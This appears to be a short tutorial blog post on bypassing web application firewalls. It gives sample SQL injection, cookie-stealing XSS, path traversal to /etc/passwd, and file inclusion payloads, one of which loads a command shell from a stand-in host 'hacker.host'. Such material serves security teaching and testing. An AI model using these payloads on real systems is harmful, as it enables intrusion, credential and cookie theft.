Part 1: Bypass a Web Application Firewall (WAF)

‍

Methods to Reduce the Threats

‍Directive Approach

• Software Development Life Cycle (SDLC); «paper security»; organization of high-level processes

Detective Approach

• Black/white-box testing of functions; fuzzing; static/dynamic/manual analysis of program code

Preventive Approach

• Intrusion Detection/Prevention Systems (IDS/IPS), Web Application Firewall (WAF)

‍

What is WAF?

‍

Methods to Bypass WAF

1. SQL Injection

There are two types of SQL Injection:

• SQL Injection into a string parameter Example: SELECT * from table where name = ‘Name’
• SQL Injection into a numeric parameter Example: SELECT * from table where id = 123

Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions

• A vulnerable request can get into Insert, Update, Delete, etc.

Example: UPDATE users SET pass = ‘1’ where user = ‘t1’OR 1=1–‘

• Blind SQL Injection

Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))

• Exploitation features for various DBMSs

Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3

Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3

2. Cross-Site Scripting (XSS)

There are two types Cross-Site Scripting (XSS):

• Persistent/stored
• Non-persistent/reflected

Cross-Site Scripting vulnerabilities typically occur in:

• HTML tags
• The body of JavaScript/VBScript/etc. (e.g. DOM-based)
• HTML code
• HTML tag parameters
• Java
• Flash
• Cross-Site Scripting is client-side vulnerability
• Microsoft Internet Explorer 8 XSS filter
• Mozilla No Script Firefox extension

General Issues:

• Stored XSS

If an attacker managed to push XSS through the filter, WAF wouldn’t be able to prevent the attack conduction

• Reflected XSS in Java Script

Example: <script> … setTimeout(”writetitle()”,$_GET[xss]) … </script>

Exploitation: /?xss=500); alert(document.cookie);//

• DOM-based XSS

Example: <script> … eval($_GET[xss]); … </script>

Exploitation: /?xss=document.cookie

Similar problems take place in the filters that protect systems from XSS at the client-side level (e.g.,IE8)

A Cross-Site Scripting attack can successfully bypass the WAF and be conducted in all following cases:

• Exploitation of DOM-based XSS
• Using HPP and HPF techniques
• Similar to exploitation of SQL Injection vulnerabilities, bypassing filter rules (signatures) and using vulnerabilities in the functions of WAF request normalization

3. Path Traversal, Local/Remote File Inclusion

An example of Path Traversal Vulnerability:

• Program logics:

<? include($_GET[‘file’].”.txt”) ;?>

index.php?file=myfile

• Exploitation example: index.php?file=/../../../../../etc/passwd%00

Risks represented byLocal File Inclusion vulnerabilities:

• Functions include()and require()regard text as a part of program code!
• Exploitation example:index.php?file=img/command_shell.jpg%00

Appearance of Remote File Inclusion:

• If allow_url_fopen & allow_url_includeare enabled, then:

index.php?file=https://hacker.host/command_shell

An example of Path Traversal vulnerability:

• Program logics:

<? include (“./files/”.$_GET[‘file’]) ;?>

• Vulnerability exploitation: /?id=/union%20select/../../../../../../../etc/passwd

The request becomes: <? include(“./files//uniX on%20sel X ect/../../../../../../../etc/passwd”) ;?>

Stay Linked!!Ali Tabish